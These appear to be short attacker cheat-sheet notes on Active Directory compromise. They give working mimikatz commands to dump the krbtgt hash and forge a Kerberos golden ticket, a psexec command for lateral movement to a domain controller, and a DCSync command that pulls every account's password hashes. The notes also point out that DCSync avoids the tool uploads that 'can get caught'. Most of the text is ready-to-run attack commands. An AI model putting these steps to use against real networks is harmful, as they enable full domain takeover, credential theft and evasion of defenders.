# Assuming that Victim account is member of Domain Admin or we have compromised the DC.
# Let's extract pass hash of krbtgt account with mimikatz.
lsadump::lsa /patch # Look for User:krbtgt and it's NTLM Hash.
kerberos::golden /user:<TOPI> /domain:<domain_name> /sid:S-1-5-21-1602875587-2787523311-2599479668 /krbtgt:<NTLM hash> /ptt
# This is allowed because DC trusts anything which is encrytped by krbtgt pass hash.
psexec.exe \\dc01 cmd.exe # Lateral movement to DC.
whoami /groups
DCSync Attack
DSync (Domain Controller Synchronization) -> Steal Pass hashes of all Admin Users in Domain.
1) Laterally move to DC and run mimikatz to dump pass hash of every user.
2) Steal ntdis.dit from DC.
3) Above 2 requires tool upload and can get caught so we use 3rd method to abuse DC's functionality.
# Login with a Local admin priv account and run mimikatz.
lsadump::dcsync /user:Administrator # Administrator is target account.
We can request a replication update with a DC and obtain the pass hashes of every account in Active Directory without ever logging in to the domain controller.